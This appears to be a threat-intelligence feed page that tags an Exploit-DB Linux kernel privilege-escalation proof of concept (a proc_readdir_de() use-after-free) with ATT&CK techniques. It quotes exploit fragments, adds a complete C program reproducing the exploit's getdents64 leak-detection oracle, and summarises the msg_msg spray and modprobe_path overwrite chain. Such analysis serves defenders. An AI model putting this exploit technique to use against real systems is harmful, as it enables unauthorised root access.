TTPwire Vol. 1 · MITRE ATT&CK-Tagged


Exploit-DB

[local] Linux Kernel proc_readdir_de() 6.18-rc5 - Local Privilege Escalation

2 days ago

ATT&CK techniques detected

9 predictions
T1068 Exploitation for Privilege Escalation · 99%
“[local] Linux Kernel proc_readdir_de() 6.18-rc5 - Local Privilege Escalation Linux Kernel proc_readdir_de() 6.18-rc5 - Local Privilege Escalation * Exploit Title: Linux Kernel proc_readdir_de() 6.18-rc5 - Local Privilege Escalation * CVE: CVE-2025…”

T1068 Exploitation for Privilege Escalation · 85%
“/self/net/dev_snmp6/) * [*] Step 3: Racing getdents vs device removal... * [+] UAF hit on attempt 4! Anomalous d_ino = 0xffff88801234abcd * [*] Step 4: Kernel heap leak: 0xffff88801234abcd * [*] Step 5: Computing modprobe_path address... * [+] Got root!…”

T1068 Exploitation for Privilege Escalation · 82%
“— nf_tables msg_msg spray reference * * DISCLAIMER: * This exploit targets an already patched vulnerability. It is provided * for educational and authorized security research purposes only. The * author is not responsible for misuse. Test only on systems you own. * */ #def…”

T1070.004 File Deletion · 71%
“return -1; } info("Attempting modprobe trigger..."); if (trigger_modprobe() == 0) { ok("Got root!"); return 0; } info("modprobe_path overwrite requires kernel-specific offset"); info("Heap leak confirmed — full chain needs target offsets"); r…”

T1068 Exploitation for Privilege Escalation · 65%
“f7322c36a1 * URL: https://git.kernel.org/linus/895b4c0c79b092d732544011c3cecaf7322c36a1 * Adds pde_erase() helper that calls rb_clear_node() after rb_erase(). * * Compilation: * gcc -Wall -Wextra -o exploit exploit.c -lpthread -static * * Usage:…”

T1055.001 Dynamic-link Library Injection · 59%
“) on /proc/self/net/dev_snmp6/ * Looking for anomalous d_ino values that indicate the UAF was hit. * * Normal d_ino values are small numbers assigned by proc_alloc_inum(). * If we see a kernel pointer (0xffff...) in d_ino, it means we read * from sprayed m…”

T1068 Exploitation for Privilege Escalation · 58%
“sys/utsname.h> #include <sys/syscall.h> #include <sys/ipc.h> #include <sys/msg.h> #include <sys/mount.h> #include <sys/ioctl.h> #include <linux/if.h> #include <linux/netlink.h> #include <linux/rtnetlink.h> #include <arpa/ine…”

T1068 Exploitation for Privilege Escalation · 53%
“..."); if (ctx->leaked_addr != 0) { ok("Kernel heap leak: 0x%016lx", (unsigned long)ctx->leaked_addr); info("This address is from msg_msg m_list.next/prev"); info("It reveals the kernel heap (physmap) randomization"); /* * With the …”

T1055.001 Dynamic-link Library Injection · 50%
“─── */ struct linux_dirent64 { uint64_t d_ino; int64_t d_off; unsigned short d_reclen; unsigned char d_type; char d_name[]; }; static long my_getdents64(int fd, void *buf, unsigned long count) { return syscall(SYS_getdents64, fd, buf, count) …”
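The excerpts above explain how the PoC knows the use-after-free was hit: a healthy procfs directory entry carries a small inum assigned by proc_alloc_inum(), so a d_ino that looks like a kernel pointer (0xffff...) means getdents64 copied from sprayed memory. The program below is an added example, not code from the Exploit-DB entry or from this page: it reads a directory with the raw getdents64 syscall and counts entries whose d_ino has the top 16 bits set. The target path, the 0xffff prefix test and the function names are this example's own assumptions; on an unaffected kernel the scan reports zero anomalies. Linux only.

```c
/*
 * Added example (not the PoC's code): walk a directory with the raw
 * getdents64 syscall and flag d_ino values that look like kernel pointers,
 * the heuristic the exploit excerpts use to detect that the
 * proc_readdir_de() UAF was hit. On an unaffected kernel every procfs
 * d_ino is a small inum from proc_alloc_inum(), so the count is zero.
 * The path and the prefix check are assumptions made for this example.
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/syscall.h>

struct linux_dirent64 {
    uint64_t       d_ino;
    int64_t        d_off;
    unsigned short d_reclen;
    unsigned char  d_type;
    char           d_name[];
};

static long my_getdents64(int fd, void *buf, unsigned long count)
{
    return syscall(SYS_getdents64, fd, buf, count);
}

/* x86-64 kernel virtual addresses live in the upper canonical half, so
 * their top 16 bits are all ones. A legitimate procfs inum is a small
 * 32-bit value and can never satisfy this test. */
int looks_like_kernel_ptr(uint64_t d_ino)
{
    return (d_ino >> 48) == 0xffff;
}

/* Count entries in `path` whose d_ino looks like a leaked kernel pointer.
 * Returns the count, or -1 if the directory cannot be opened. When `leak`
 * is non-NULL the first anomalous value is stored there, which is the
 * value a detection loop would hand to the next stage of a chain. */
int count_anomalous_inos(const char *path, uint64_t *leak)
{
    char buf[8192];
    int fd = open(path, O_RDONLY | O_DIRECTORY);
    if (fd < 0)
        return -1;

    int anomalies = 0;
    for (;;) {
        long nread = my_getdents64(fd, buf, sizeof buf);
        if (nread <= 0)
            break;
        for (long pos = 0; pos < nread;) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + pos);
            if (looks_like_kernel_ptr(d->d_ino)) {
                if (anomalies == 0 && leak)
                    *leak = d->d_ino;
                anomalies++;
            }
            pos += d->d_reclen;
        }
    }
    close(fd);
    return anomalies;
}

int main(void)
{
    uint64_t leak = 0;
    /* Assumed path: the directory the excerpts race getdents against. */
    int n = count_anomalous_inos("/proc/self/net/dev_snmp6/", &leak);
    if (n < 0)
        printf("cannot open directory\n");
    else if (n == 0)
        printf("no anomalous d_ino: directory reads clean\n");
    else
        printf("%d anomalous d_ino value(s), first = 0x%016llx\n",
               n, (unsigned long long)leak);
    return 0;
}
```

A single clean read proves nothing about the race itself; the PoC's "attempt 4" line shows the scan has to be repeated while the device is being removed, and the count is only the oracle that tells the loop when to stop.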

Summary

Linux Kernel proc_readdir_de() 6.18-rc5 - Local Privilege Escalation

The excerpts describe a use-after-free reached through proc_readdir_de(). The PoC races getdents64 on /proc/self/net/dev_snmp6/ against device removal and detects a hit when a directory entry's d_ino holds a kernel pointer (0xffff...) instead of the small inum assigned by proc_alloc_inum(). It references the nf_tables msg_msg spray technique for its heap spray, so the leaked value comes from a msg_msg m_list.next/prev pointer and exposes the kernel heap (physmap) randomization; the next step is computing and overwriting modprobe_path. The code itself states that the overwrite requires kernel-specific offsets, so as published the chain stops at a confirmed heap leak unless target offsets are supplied. The disclaimer says the bug is already patched, and the referenced fix (https://git.kernel.org/linus/895b4c0c79b092d732544011c3cecaf7322c36a1) adds a pde_erase() helper that calls rb_clear_node() after rb_erase(). The T1070.004 (File Deletion) and T1055.001 (Dynamic-link Library Injection) tags are attached to the modprobe-trigger output and to the getdents64 wrapper and directory scan; nothing in those excerpts describes file deletion or DLL injection, so T1068 is the technique the text actually supports.